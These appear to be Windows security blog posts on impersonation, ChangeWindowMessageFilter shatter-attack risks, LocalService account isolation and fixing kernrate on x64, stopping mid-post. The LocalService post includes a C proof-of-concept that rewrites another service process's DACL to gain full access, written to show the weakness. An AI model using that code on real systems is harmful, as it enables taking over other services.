Now, some of you are by this point probably thinking “What’s he talking about? LocalService and NetworkService aren’t the same thing as LocalSystem.”, and to a certain extent, that is true, at least when you consider a trivial service on its own. There are many ways in which these “low privileged” services are actually more privileged than might meet the eye at first glance, however. Many of these “low privileged services” happen to work in a way such that although they don’t explicitly run with System/Administrator privileges, if the service “really wanted to”, it could get high privileges with the resources made available to it. Now, in my mind, when you are considering whether two things are equivalent from a privilege level, the proper thing to do is to consider the maximum privilege set a particular program could run with, which might not be the same as the privilege set of the account the process runs as.

To see what I mean, it’s necessary to understand an integral part of the Windows security model called impersonation. Impersonation allows one program to “borrow” the security context of another program, with that program’s consent, for purposes of performing a particular operation on behalf of that program. This is classically described as a higher privileged server that, when receiving a request from a client, obtains the privileges of the client and uses them to carry out the task in question. Thus, impersonation is often seen as a way to ensure that a high privileged server is not “tricked” into doing a dangerous operation on behalf of a client, because it “borrows” the client’s security context for the duration of the operation it is performing on behalf of that client. In other words, for the duration of that operation, the server’s privileges are effectively the same as the client’s, which often results in the server appearing to “drop privileges” temporarily.

Now, impersonation is an important part of practically all of the Windows IPC (inter-process communication) mechanisms, such as named pipes, RPC, LPC, and soforth. Aside from the use of impersonation to authoritatively identify the identity of a caller for purposes of access checks, many services use impersonation to “drop privileges” for an operation to the same level of security as a caller (such that if a “plain user” tries to make a call that does some operation requiring administrative privileges, even if the service was running with those administrative privileges originally, any resources accessed by the server during impersonation are treated as if the “plain user” accessed them. This prevents the “plain user” from successfully performing the dangerous / administrative task without the proper privileges being granted to it).

All this is well and fine, but there’s a catch: impersonation can also effectively elevate the privileges of a thread, not just lower them. Therein lies the rub with svchosts and LocalService / NetworkService accounts, since while these accounts may appear to be unprivileged at first glance, many of them operate RPC or LPC or named pipe servers that that privileged clients connect to on a regular basis. If one of these “low privileged” services is then compromised, although an attacker might not immediately be able to gain control of the system by elevating themself to LocalSystem privileges, with a bit of patience he or she can still reach the same effect. Specifically, the attacker need only take over the server part of the RPC / LPC / other IPC interface, wait for an incoming request, then impersonate the caller. If the caller happens to be highly privileged, then poof! All of a sudden the lowly, unprivileged LocalService / NetworkService just gained administrative access to the box.

Of course, the designers of the NT security system forsaw this problem a mile away, and built in features to the security system to prevent its abuse. Foremost, the caller gets to determine to what extent the server can impersonate it, via the use of a little-known attribute known as the Security Quality of Service (SQOS). Via the SQOS attribute (which can be set on any call that enables a remote server to impersonate one’s security context), a client can specify that a service can query its identity but not use that identity to perform access or privilege checks, as opposed to giving the server free reign over its identity once it connects. Secondly, in the post-Windows 2000 era, Microsoft restricted impersonation to accounts with a newly-created privilege, SeImpersonatePrivilege, which is by default only granted to LocalService / NetworkService / LocalSystem and administrative accounts.

So, impersonation isn’t really broken by design (and indeed David LeBlanc has an excellent article describing how, if used correctly, impersonation isn’t the giant security hole that you might think it is.

That being said, impersonation can still be very dangerous if misused (like many other aspects of the security system).

Coming up: A look at how all of this impersonation nonsense applies to LocalService / NetworkService (and svchost processes) in Windows (past and future versions).

Why you shouldn’t touch Change­Window­Message­Filter with a 10-ft pole…

Tuesday, July 31st, 2007

One of the things introduced with Windows Vista is the concept of something called “user interface privilege isolation”, or an attempt to allow multiple processes to coexist on one desktop even if they are running at different privilege levels, without compromising security. This new change to the security architecture with respect to how the user interface operates is also a significant part of how UAC and Internet Explorer Protected Mode can claim be to be reasonably secure, despite displaying user interfaces from differing security contexts on the same desktop.

(For reference, the Windows GUI model was designed back in the 16-bit cooperative multitasking days, where every task (yes, task – there weren’t processes or threads in Windows in those days) completely trusted every other task. Although things have improved somewhat since then, there are a number of assumptions that are so fundamental to how the Windows GUI model works that it is virtually impossible to eliminate all communication between GUI programs via window messages and still have the system function, which leads to many of the difficulties in securing user interface communications in Windows. As a result, the desktop has traditionally been considered the “security barrier” in terms of the Windows UI, such that processes of differing privilege levels should be isolated on their own desktops. Of course, since only one desktop is displayed locally at a time, this is less than convenient from an end user’s perspective.)

Most of the changes that were made in Vista relate to restrictions on just how processes from different integrity levels or user accounts can communicate eachother using the window messaging system. Window messages are typically split up into several different categories:

  1. System marshalled messages, or messages that come before WM_USER. These are messages that for compatibility with 16-bit Windows (and convenience), are automagically marshalled cross process. For example, this is why you can send the LB_ADDSTRING message to a window located in a different process, even though that message takes a pointer to a string which would obviously not be valid in the remote address space. The windowing system understands the semantics of all system marshalled messages and can thus, as the name implies, marshal them cross-process. This also means that in many circumstances, the system can also perform parameter validation in the cross process case, so that for instance a null pointer passed to LB_ADDSTRING won’t cause the remote process to crash. The system marshalled range also includes messages like WM_DESTROY, WM_QUIT, and the like. Most of the “built in” controls like the Edit and ListBox controls are “grandfathered in” to the system marshalled range, for compatibility reasons, though the newer common controls are not specially handled like this.
  2. The private window class message range, from WM_USER to 0x7FFF. These messages are specific to a particular custom window class (note that common controls, such as Rich Edit, are “custom” window classes even though you might think of them as being built in to the operating system; the windowing system ostensibly has no special knowledge of these controls, unlike the “built-in” controls like ListBox or Edit). Because the format and semantics of these messages are specific to a program-supplied window class, the window manager cannot interpret, marshal, or validate these parameters cross-process.
  3. The private application message range, from WM_APP to 0xBFFF. These window messages are specific to a program (and not a window class), though in practice it is very common for programmers to incorrectly interchange WM_USER and WM_APP for custom window classes that are internal to an application. These window messages are again completely opaque to the window manager and are essentially treated the same as private window class messages. Their intended use is to allow things like application customized subclasses of window classes to communicate with eachother (e.g. in the case where the application hooks a window procedure).
  4. The registered message range, from 0xC000 to 0xFFFF. Window messages here are dynamically assigned similarly to how atoms work in Windows. Specifically, a program passes an arbitrary string to the RegisterWindowMessage routine, which hands the application back a value in the registered message range. Any other program calling RegisterWindowMessage in the same session will receive the same window message value. These messages are, like class- and application- defined messages, opaque to the system. They are used when programs need to communicate cross-process with custom window messages, without the use of some sort of central registry where window messages would have to be permanently registered with Microsoft in order to receive a unique, non-conflicting identifier. By using an arbitrary string value (easy to make unique) and dynamically reserving a numeric message identifier at runtime, no registry is required and programs following the “standard” for that window message can still communicate with eachother. Registered window messages are not marshalled or interpreted by the windowing system.

Now, in Windows Vista, only a subset of the system marshalled messages can be sent cross-process when the two processes have different integrity levels, and this subset of messages is heavily validated by the system, such that if a program receives a message in the system marshalled range, it can ostensibly “trust” it. Since the windowing system cannot validate custom messages (in any of the other three categories), these are all silently dropped by default in this scenario. This is typically a good thing (consider that many common control messages have pointers in their contracts and lie in the WM_USER range, making it very bad for an untrusted program to be able to send them to a privileged application). However, sometimes one does need to send custom messages cross-process. Vista provides a mechanism for this in the ChangeWindowMessageFilter function, which is essentially a way to “poke a hole” in the window message “firewall” that exists between cross-integrity-level processes in Vista.
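
For reference, here’s roughly what a call looks like (a minimal sketch assuming Vista-era SDK headers; the message value is a hypothetical application-defined one):

#include <windows.h>

#ifndef MSGFLT_ADD
#define MSGFLT_ADD 1            /* defined in winuser.h for Vista+ targets */
#endif

/* Hypothetical application-defined message, for illustration only. */
#define WM_EXAMPLE_NOTIFY (WM_APP + 0x100)

BOOL AllowExampleMessageFromLowerIntegrity(void)
{
    /*
     * Note that the filter change is process-wide: after this call, every
     * window in the process can receive WM_EXAMPLE_NOTIFY from a lower
     * integrity sender, which is exactly why holes poked for messages like
     * WM_USER + 1 are so dangerous.
     */
    return ChangeWindowMessageFilter(WM_EXAMPLE_NOTIFY, MSGFLT_ADD);
}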

Now, this might seem like a great approach at first – after all, you’ll only use ChangeWindowMessageFilter when you’re sure you can completely validate a received message even if it is from an untrusted source, such that there’s no way something could go wrong, right?

Well, the problem is that even if you do this, you are often opening your program up to attack unintentionally. Consider for a moment how custom window messages are typically used; virtually all the common controls in existence have “dangerous” messages in the custom class message range (e.g. WM_USER and friends). Additionally, many programs and third party libraries confuse WM_USER and WM_APP, such that you may have programs communicating cross-process via both WM_USER and WM_APP, via “dangerous” messages that are used to make sensitive decisions or include pointer parameters.

This means that in reality, you can’t really use ChangeWindowMessageFilter for a specific window message unless you are absolutely sure that nobody else in your process is listening for that message and can’t be exploited if they receive a malformed (or specially crafted) message. Right away, this pretty much excludes all WM_USER messages, and even WM_APP is highly questionable in my opinion due to how frequently components mix up WM_USER and WM_APP.

Well, that’s still not so bad, is it? After all, you can just ensure that any third party modules you use don’t do stupid things with custom window messages, if you’ve got source code to them, right? Well, aside from the fact that that is a pretty implausible scenario in reality, the problem is even worse. There is rampant use of ChangeWindowMessageFilter in operating-system-shipped libraries that your program is already using on Vista, which you have absolutely no control over. For instance, if one looks at Shell32.dll with a disassembler in Vista, one might see this in, say, the SHChangeNotifyRegister function:

mov     edx, 1          ; MSGFLT_ADD
mov     ecx, 401h       ; WM_USER + 1
call    cs:__imp_ChangeWindowMessageFilter

In other words, SHChangeNotifyRegister just promised to the window message firewall that everybody in the entire process fully validates the custom class message WM_USER + 1. Yow! The WM_USER range is the worst of any to be doing that on, especially a low WM_USER value, because practically everything that uses a custom window class will use a WM_USER message for something, and the chances of a collision with the set of all custom window classes go up dramatically that close to the start of the custom window class range. Now, just for kicks, let’s take a look at the SDK headers and see if any of the built-in common controls have any interesting messages that match WM_USER + 1, or 0x401:

AclUI.h(142):#define PSPCB_SI_INITDIALOG (WM_USER + 1)
CommCtrl.h(1458):#define TB_ENABLEBUTTON (WM_USER + 1)
CommCtrl.h(2562):#define TTM_ACTIVATE (WM_USER + 1)
CommCtrl.h(6230):#define CBEM_INSERTITEMA (WM_USER + 1)
CommDlg.h(765):#define WM_CHOOSEFONT_GETLOGFONT (WM_USER + 1)
[…]

Let’s look at the documentation for some of those window messages in MSDN. Hmm, there’s CBEM_INSERTITEM[A|W], which takes, in lParam, “A pointer to a COMBOBOXEXITEM structure…”. Oh, and there’s also WM_CHOOSEFONT_GETLOGFONT, which uses lParam for a “pointer to a LOGFONT structure…”. Hmm, let me see. Anybody who calls SHChangeNotify is promising that they are not using any ComboBoxEx controls, any ChooseFont dialogs, or any of the other many hits for dangerous WM_USER + 1 messages that I didn’t list for space reasons. Oh, and that’s just the built-in controls – what happens if there’s a third party control thrown in there? What if we’re running in Internet Explorer and there’s a custom ActiveX control showing its own user interface there, blissfully unaware that some other code in the process called SHChangeNotify? That means that anybody, anywhere, who calls SHChangeNotify on Vista (or uses a library or function that calls SHChangeNotify internally, which is probably not going to be documented at all, being an implementation detail) just reinvented the shatter attack with their program (congratulations!), probably without even realizing it – how would they, if they didn’t take the time to disassemble the API instead of trusting that it just works?

Now, I might be coming off a bit harsh on Microsoft here, but that’s kind of my point. Microsoft puts a lot of effort into security, and they’re the ones who designed and implemented the new security improvements in Vista. Sadly, this is hardly an isolated incident in Vista – with a little bit of looking, it’s very easy to find numerous other examples of system libraries that are loaded and called all over the place making this sort of error, which represents, in my opinion, a fundamental lack of understanding of how user interface security works.

Now, if the company that designed and implemented ChangeWindowMessageFilter is using it wrong, how many third party developers out there, who just want to get their program working under Vista in the quickest way possible with the minimum amount of effort and money spent, will do the right thing? MSDN doesn’t even document this entire class of problems with ChangeWindowMessageFilter as far as I can tell, so to be honest I think I can be fairly confident and say “virtually nobody”. It takes someone with a fairly good understanding of how the window messaging system impacts security to recognize and grasp this problem, and that only includes people who are even thinking about security in the first place when they see a function like ChangeWindowMessageFilter, who I’m betting are already in the vast minority.

This function is one that is all but impossible to use correctly, aside from just maybe messages in the registered message range, which are already expected to be cross-process and not fully trusted (and I’m still skeptical that people will, on average, get it right even in that case).

There are almost certainly other loopholes in the UIPI architecture that have yet to be discovered, if for no other reason than that it is a security bolt-on to an architecture that was designed for a single shared address space in a cooperative multitasking system. I wouldn’t say that this is so much the fault of the UIPI folks as the fact that it’s just going to be ridiculously hard to make it completely safe to run programs with multiple privilege levels on the same desktop. And, remember, the “good guys” have to get it right 100% of the time from a security perspective, while the “bad guys” only need to find that one case out of 1000 that got missed in order to break the system.

So, do yourself a favor and stick to the desktop as a security barrier; the 16-bit Windows-derived window messaging system was just not designed to support programs at different privilege levels on the same desktop.

Be careful about using the built-in “low privilege” service accounts…

Wednesday, July 25th, 2007

One of the security enhancements in the Windows XP and Windows Server 2003 timeframe was to move a number of the built-in services that ship with the OS to run as a more restricted user account than LocalSystem. Specifically, two new built-in accounts akin to LocalSystem were introduced exclusively for use with services: The local service and network service accounts. These are essentially slightly more powerful than plain user accounts, but not powerful enough such that a compromise will mean the entire system is a write-off.

The intention here was to reduce the attack surface of the system as a whole, such that if a service that is running as LocalService or NetworkService is compromised, then it cannot be used to take over the system as a whole.

(For those curious, the difference between LocalService and NetworkService is only evident in domain scenarios. If the computer is joined to a domain, LocalService authenticates as a guest on the network, while NetworkService (like LocalSystem) authenticates as the computer account.)

Now, reducing the amount of code running as LocalSystem is a great thing pretty much all around, but there are some sticking points with the way the two built-in service accounts work that aren’t really covered in the documentation. Specifically, there are a whole lot of other services that run as either LocalService or NetworkService nowadays, and by virtue of the fact that they all run in the same security context, they can be compromised as one unit. In other words, if you compromise one LocalService process, you can attack all other LocalService processes, because they are running under the same security context.

Think about that for a minute. That effectively means that the attack surface of any LocalService process can in some sense be considered the sum of the attack surface of all LocalService processes on the same computer. Moreover, that means that as you offload more and more services to run as LocalService, the problem gets worse. (Although, it’s still better than the situation when everybody ran as LocalSystem, certainly.)

Windows Vista improves on this a little bit; in Vista, LocalService and NetworkService processes do have a little bit of protection from each other, in that each service instance is assigned a unique SID that is marked as the owner for the process object (even though the process is running as LocalService or NetworkService). Furthermore, the default DACL for processes running as LocalService or NetworkService only grants access to administrators and the service-unique SID. This means that in Vista, one compromised LocalService process can’t simply use OpenProcess and WriteProcessMemory (or the like) to take complete control over another service process.

You can easily see this in action in the kernel debugger. Here’s what things look like in Vista:

kd> !process fffffa80022e0c10
PROCESS fffffa80022e0c10
[...]
    Token   fffff88001e3e060
[...]
kd> !token fffff88001e3e060
_TOKEN fffff88001e3e060
TS Session ID: 0
User: S-1-5-19
Groups:
[...]
 10 S-1-5-5-0-107490
    Attributes - Mandatory Default Enabled Owner LogonId 
[...]
kd> !object fffffa80022e0c10
Object: fffffa80022e0c10  Type: (fffffa8000654840) Process
    ObjectHeader: fffffa80022e0be0 (old version)
    HandleCount: 5  PointerCount: 96
kd> dt nt!_OBJECT_HEADER fffffa80022e0be0
[...]
   +0x028 SecurityDescriptor : 0xfffff880`01e14c26 
kd> !sd 0xfffff880`01e14c20
->Revision: 0x1
[...]
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x1c
->Dacl    : ->Ace[0]: ->Mask : 0x001fffff
->Dacl    : ->Ace[0]: ->SID: S-1-5-5-0-107490

->Dacl    : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[1]: ->AceFlags: 0x0
->Dacl    : ->Ace[1]: ->AceSize: 0x18
->Dacl    : ->Ace[1]: ->Mask : 0x00001400
->Dacl    : ->Ace[1]: ->SID: S-1-5-32-544

Looking at winnt.h, we can see that S-1-5-5-X-Y corresponds to a logon session SID. In Vista, each LocalService/NetworkService service process gets its own logon session SID.

By making the process owned by a different user than it is running as, and not allowing access to the user that the service is running as (but instead the logon session), the service is provided some measure of protection against processes in the same user context. This may not provide complete protection, though, as in general, any securable objects such as files or registry keys that contain an ACE matching against LocalService or NetworkService will be at the mercy of all such processes. To Microsoft’s credit, however, the default DACL in the token for such LocalService/NetworkService services doesn’t grant GenericAll to the user account for the service, but rather the service SID (another concept that is unique to Vista and future systems).
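
If you’d rather see this from user mode than from the kernel debugger, a rough sketch along these lines will dump the ACEs in the current process token’s default DACL (error handling is abbreviated and a fixed-size buffer is assumed to be large enough):

#include <windows.h>
#include <sddl.h>
#include <stdio.h>

int main(void)
{
    HANDLE              token;
    BYTE                buffer[4096];
    DWORD               returned;
    DWORD               i;
    TOKEN_DEFAULT_DACL *defaultDacl = (TOKEN_DEFAULT_DACL *)buffer;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token))
        return 1;

    if (!GetTokenInformation(token, TokenDefaultDacl, defaultDacl,
                             sizeof(buffer), &returned) ||
        !defaultDacl->DefaultDacl)
        return 1;

    for (i = 0; i < defaultDacl->DefaultDacl->AceCount; i++)
    {
        ACCESS_ALLOWED_ACE *ace;
        LPSTR               sidString;

        if (!GetAce(defaultDacl->DefaultDacl, i, (LPVOID *)&ace))
            continue;

        if (ace->Header.AceType != ACCESS_ALLOWED_ACE_TYPE)
            continue;

        /*
         * On Vista, expect to see the per-service SID here rather than
         * S-1-5-19 (LocalService) or S-1-5-20 (NetworkService).
         */
        if (ConvertSidToStringSidA((PSID)&ace->SidStart, &sidString))
        {
            printf("Allow 0x%08lX to %s\n",
                   (unsigned long)ace->Mask, sidString);
            LocalFree(sidString);
        }
    }

    CloseHandle(token);
    return 0;
}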

Furthermore, it seems like many of the ACLs that previously referred to LocalService/NetworkService are being transitioned to use service SIDs instead, which may over time make LocalService/NetworkService viable once again, after all the third party software in the world that makes security decisions based on those two SIDs is updated (hmm…), and after the remaining ACLs that refer to the old generalized SIDs and have fallen through the cracks are updated. (Check out AccessEnum from SysInternals to see where those ACLs have slipped through the cracks in Vista – there are at least a couple of places in WinSxS that mention LocalService or NetworkService for write access on my machine, and that isn’t even considering the registry or the more ephemeral kernel object namespace yet.)

In Windows Server 2003, things are pretty bleak with respect to isolation between LocalService/NetworkService services, as shown by their default security descriptors. The default security descriptor on a service process doesn’t explicitly grant other LocalService processes access, but it does allow one to rewrite the DACL and grant oneself access, as the owner field matches LocalService:

lkd> !process fffffadff39895c0 1
PROCESS fffffadff3990c20
[...]
    Token                             fffffa800132b9e0
[...]
lkd> !token fffffa800132b9e0
_TOKEN fffffa800132b9e0
TS Session ID: 0
User: S-1-5-19
Groups:
[...]
 07 S-1-5-5-0-44685
    Attributes - Mandatory Default Enabled LogonId
[...] 
lkd> !object fffffadff3990c20
Object: fffffadff3990c20  Type: (fffffadff4310a00) Process
    ObjectHeader: fffffadff3990bf0 (old version)
    HandleCount: 3  PointerCount: 21
lkd> dt nt!_OBJECT_HEADER fffffadff3990bf0
[...]
   +0x028 SecurityDescriptor : 0xfffffa80`011441ab 
[...]
lkd> !sd 0xfffffa80`011441a0
->Revision: 0x1
->Sbz1    : 0x0
->Control : 0x8004
            SE_DACL_PRESENT
            SE_SELF_RELATIVE
->Owner   : S-1-5-19
[...]
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x1c
->Dacl    : ->Ace[0]: ->Mask : 0x001f0fff
->Dacl    : ->Ace[0]: ->SID: S-1-5-5-0-44685

->Dacl    : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[1]: ->AceFlags: 0x0
->Dacl    : ->Ace[1]: ->AceSize: 0x14
->Dacl    : ->Ace[1]: ->Mask : 0x00100201
->Dacl    : ->Ace[1]: ->SID: S-1-5-18

Again looking at winnt.h, we clearly see that S-1-5-19 is LocalService. So, there is effectively no protection at all from one compromised LocalService process attacking another, at least in Windows Server 2003.

Note that if you are marked as the owner of an object, you can rewrite the DACL freely by requesting a handle with WRITE_DAC access and then modifying the DACL field with a function like SetKernelObjectSecurity. From there, all you need to do is re-request a handle with the desired access, after modifying the security descriptor to grant yourself said access. This is easy to verify experimentally by writing a test service that runs as LocalService and requesting WRITE_DAC in an OpenProcess call for another LocalService service process.
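
A rough sketch of what such an experiment might look like follows (the target PID is a hypothetical value supplied by the caller, and for brevity the rewritten DACL is simply a NULL DACL, which grants everyone access; this assumes the caller is itself running as LocalService on Srv03, so that the implicit owner rights apply):

#include <windows.h>

/*
 * Sketch only: running as LocalService on Windows Server 2003, take over
 * another LocalService process identified by targetPid (hypothetical value
 * supplied by the caller).  This works because LocalService is the object
 * owner, and owners are implicitly granted WRITE_DAC regardless of the DACL.
 */
BOOL TakeOverLocalServiceProcess(DWORD targetPid, HANDLE *fullAccessHandle)
{
    SECURITY_DESCRIPTOR sd;
    HANDLE              writeDacHandle;

    writeDacHandle = OpenProcess(WRITE_DAC, FALSE, targetPid);
    if (!writeDacHandle)
        return FALSE;

    /* For brevity, install a NULL DACL (grants everyone access); granting
       just one's own logon session SID would be less noisy. */
    if (!InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION) ||
        !SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE)               ||
        !SetKernelObjectSecurity(writeDacHandle,
                                 DACL_SECURITY_INFORMATION, &sd))
    {
        CloseHandle(writeDacHandle);
        return FALSE;
    }

    CloseHandle(writeDacHandle);

    /* Re-request a handle with the access we actually want. */
    *fullAccessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPid);
    return *fullAccessHandle != NULL;
}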

To make matters worse, nowadays most services run in shared svchost processes, which means that if one service in such an svchost is compromised, the whole process is a write-off.

I would recommend seriously considering using dedicated unique user accounts for your services in certain scenarios as a result of this unpleasant mess. In the case where you have a security sensitive service that doesn’t need high privileges (i.e. it doesn’t require LocalSystem), it is often the wrong thing to do to just stuff it in with the rest of the LocalService or NetworkService services due to the vastly increased attack surface over running as a completely isolated user account, even if setting up a unique user account is a pain to do programmatically.

Note that although Vista attempts to mitigate this problem by ensuring that LocalService/NetworkService services cannot directly interfere with each other in the most obvious sense of opening each other’s processes and writing code into each other’s address spaces, this is really only a small measure of protection, due to the problem that one LocalService process’s data files are at the mercy of every other LocalService process out there. I think that it would be extremely unwise to stake your system security on there being no way to compromise one LocalService process from another in Vista, even with its mitigations; it may be slightly more difficult, but I’d hardly write it off as impossible.

Given all of this, I would steer clear of NetworkService and LocalService for sensitive but unprivileged processes (and yes, I would consider such a thing a real scenario, as you don’t need to be a computer administrator to store valuable data on a computer; you just need there to not be an untrusted (or compromised) computer administrator on the box).

One thing I am actually kind of curious about is what the SWI rationale is for even allowing the svchost paradigm by default, given how it tends to (negatively, from the perspective of system security) multiply the attack surface of all svchost’d processes. Using svchosts completely blows away the security improvements Vista makes to LocalService / NetworkService, as far as I can tell. Even though there are some services that are partitioned off in their own svchosts, there’s still one giant svchost group in Vista that has something on the order of ~20 services in it (ugh!). Not to mention that svchosts make debugging a nightmare, but that’s a topic for another posting.

Update: Andrew Rogers pointed out that I originally posted the security descriptor for a LocalSystem process in the Windows Server 2003 example, instead of for a LocalService process. Whoops! It actually turns out that contrary to what I originally wrote, the DACL on LocalService processes on Windows Server 2003 doesn’t explicitly allow access to LocalService, but LocalService is still named as the object owner, so it is trivial to gain that access anyway, as previously mentioned (at least for Windows Server 2003).

Why doesn’t the publicly available kernrate work on Windows x64? (and how to fix it)

Monday, June 4th, 2007

Previously, I wrote up an introduction to kernrate (the Windows kernel profiler). In that post, I erroneously stated that the KrView distribution includes a version of kernrate that works on x64. Actually, it supports IA64 and x86, but not x64. A week or two ago, I had a problem on an x64 box of mine that I wanted to help track down using kernrate. Unfortunately, I couldn’t actually find a working kernrate for Windows x64 (Srv03 / Vista).

It turns out that nowhere is there a published kernrate that works on any production version of Windows x64. KrView ships with an IA64 version, and the Srv03 resource kit ships with an x86 version only. (While you can run the x86 version of kernrate in Wow64, you can’t use it to profile kernel mode; for that, you need a native x64 version.)

A bit of digging turned up a version of kernrate labeled ‘AMD64’ in the Srv03 SP0 DDK (the 3790.1830 / Srv03 SP1 DDK doesn’t include kernrate at all, only documentation for it, and the 6000 WDK omits even the documentation, which is really quite a shame). Unfortunately, that version of kernrate, while compiled as native x64 and theoretically capable of profiling the x64 kernel, doesn’t actually work. If you try to run it, you’ll get the following error:

NtQuerySystemInformation failed status c0000004
KERNRATE: Failed to get SYSTEM_BASIC_INFORMATION

So, no dice even with the Srv03 SP0 DDK version of kernrate, or so I thought. Ironically, the various flavors of x86 (including 3790.0) kernrate I could find all worked on Srv03 x64 SP1 (3790.1830) / Vista x64 SP0 (6000.0), but as I mentioned earlier, you can’t use the profiling APIs to profile kernel mode from a Wow64 program. So, I had a kernrate that worked but couldn’t profile kernel mode, and a kernrate that should have worked and been able to profile kernel mode except that it bombed out right away.

After running into that wall, I decided to try and get ahold of someone at Microsoft who I suspected might be able to help, Andrew Rogers from the Windows Serviceability group. After trading mails (and speculation) back and forth a bit, we eventually determined just what was going on with that version of kernrate.

To understand what the deal is with the 3790.0 DDK x64 version of kernrate, a little history lesson is in order. When the production (“RTM”) version of Windows Server 2003 was released, it was supported on two platforms: x86, and IA64 (“Windows Server 2003 64-bit”). This continued until the Srv03 Service Pack 1 timeframe, when support for another platform “went gold” – x64 (or AMD64). Now, this means that the production code base for Srv03 x64 RTM (3790.1830) is essentially comparable to Srv03 x86 SP1 (3790.1830). While normally there aren’t “breaking changes” (or at least, they are kept to a minimum) from service pack to service pack, Srv03 x64 is kind of a special case.

You see, there was no production / RTM release of Srv03 x64 3790.0, or a “Service Pack 0” for the x64 platform. As a result, in a special case, it was acceptable for there to be breaking changes from 3790.0/x64 to 3790.1830/x64, as pre-3790.1830 builds could essentially be considered beta/RC builds and not full production releases (and indeed, they were not generally publicly available as in a normal production release).

If you’re following me this far, you might be thinking “wait a minute, didn’t he say that the 3790.0 x86 build of kernrate worked on Srv03 3790.1830?” – and in fact, I did imply that (it does work). The breaking change in this case only relates to 64-bit-specific parts, which for the most part excludes things visible to 32-bit programs (such as the 3790.0 x86 kernrate).

In this particular case, it turns out that part of the SYSTEM_BASIC_INFORMATION structure was changed from the 3790.0 timeframe to the 3790.1830 timeframe, with respect to x64 platforms.

The 3790.0 structure, as viewed from x64 builds, is approximately like this:

typedef struct _SYSTEM_BASIC_INFORMATION_3790 {
    ULONG Reserved;
    ULONG TimerResolution;
    ULONG PageSize;
    ULONG_PTR NumberOfPhysicalPages;
    ULONG_PTR LowestPhysicalPageNumber;
    ULONG_PTR HighestPhysicalPageNumber;
    ULONG AllocationGranularity;
    ULONG_PTR MinimumUserModeAddress;
    ULONG_PTR MaximumUserModeAddress;
    KAFFINITY ActiveProcessorsAffinityMask;
    CCHAR NumberOfProcessors;
} SYSTEM_BASIC_INFORMATION_3790, *PSYSTEM_BASIC_INFORMATION_3790;

However, by the time 3790.1830 (the “RTM” version of Srv03 x64 / XP x64) was released, a subtle change had been made:

typedef struct _SYSTEM_BASIC_INFORMATION {
	ULONG Reserved;
	ULONG TimerResolution;
	ULONG PageSize;
	ULONG NumberOfPhysicalPages;
	ULONG LowestPhysicalPageNumber;
	ULONG HighestPhysicalPageNumber;
	ULONG AllocationGranularity;
	ULONG_PTR MinimumUserModeAddress;
	ULONG_PTR MaximumUserModeAddress;
	KAFFINITY ActiveProcessorsAffinityMask;
	CCHAR NumberOfProcessors;
} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION;

Essentially, three ULONG_PTR fields were “contracted” from 64-bits to 32-bits (by changing the type to a fixed-length type, such as ULONG). The cause for this relates again to the fact that the first 64-bit RTM build of Srv03 was for IA64, and not x64 (in other words, “64-bit Windows” originally just meant “Windows for Itanium”, something that is to this day still unfortunately propagated in certain MSDN documentation).

According to Andrew, the reasoning behind the difference between the two structure versions is that those three fields were originally defined as either a pointer-sized data type (such as SIZE_T or ULONG_PTR – for 32-bit builds) or a 32-bit data type (such as ULONG – for 64-bit builds) in terms of the _IA64_ preprocessor constant, which indicates an Itanium build. However, 64-bit builds for x64 do not use the _IA64_ constant, which resulted in the structure fields being erroneously expanded to 64 bits for the 3790.0/x64 builds. By the time Srv03 x64 RTM (3790.1830) had been released, the page counts had been fixed to be defined in terms of the _WIN64 preprocessor constant (indicating any 64-bit build, not just an Itanium build). As a result, the fields that were originally 64 bits long for the prerelease 3790.0/x64 build became only 32 bits long for the RTM 3790.1830/x64 production build. (Note that because the page counts are expressed as a count of physical pages, which are at least 4096 bytes on x86 and x64, and significantly larger for large physical pages on those platforms, keeping them as a 32-bit quantity is not a terribly limiting factor on total physical memory given today’s technology, and that of the foreseeable future, at least as far as systems that NT-based kernels will run on are concerned.)
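
To illustrate the idea (this is a reconstruction with hypothetical type names, not the actual Windows header text):

#include <windows.h>

/*
 * Illustrative reconstruction only; hypothetical typedef names.  The page
 * count fields were originally conditional on _IA64_, so the pre-release
 * x64 build (where _IA64_ is not defined) fell into the pointer-sized
 * branch and got 64-bit fields:
 */
#if defined(_IA64_)
typedef ULONG     SBI_PAGE_COUNT_3790_0;    /* 32 bits on Itanium builds    */
#else
typedef ULONG_PTR SBI_PAGE_COUNT_3790_0;    /* pointer-sized elsewhere,
                                               including (oops) x64 builds  */
#endif

/*
 * The 3790.1830 fix keys off _WIN64 instead, so every 64-bit build
 * (Itanium and x64 alike) gets a 32-bit page count:
 */
#if defined(_WIN64)
typedef ULONG     SBI_PAGE_COUNT_3790_1830;
#else
typedef ULONG_PTR SBI_PAGE_COUNT_3790_1830; /* 32 bits anyway on x86 */
#endif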

The end result of this change is that the SYSTEM_BASIC_INFORMATION structure that kernrate 3790.0/x64 tries to retrieve is incompatible with the 3790.1830/x64 (RTM) version of Srv03, hence the call failing with c0000004 (otherwise known as STATUS_INFO_LENGTH_MISMATCH). The culmination of this is that the 3790.0/x64 version of kernrate will abort on production builds of Srv03, as the SYSTEM_BASIC_INFORMATION structure format is incompatible with the version kernrate is expecting.

Normally, this would be pretty bad news; the program was compiled against a different layout of an OS-supplied structure. Nonetheless, I decided to crack open kernrate.exe with IDA and HIEW to see what I could find, in the hopes of fixing the binary to work on RTM builds of Srv03 x64. It turned out that I was in luck, and there was only one place that actually retrieved the SYSTEM_BASIC_INFORMATION structure, storing it in a global variable for future reference. Unfortunately, there were a great many references to that global; too many to be practical to fix to reflect the new structure layout.

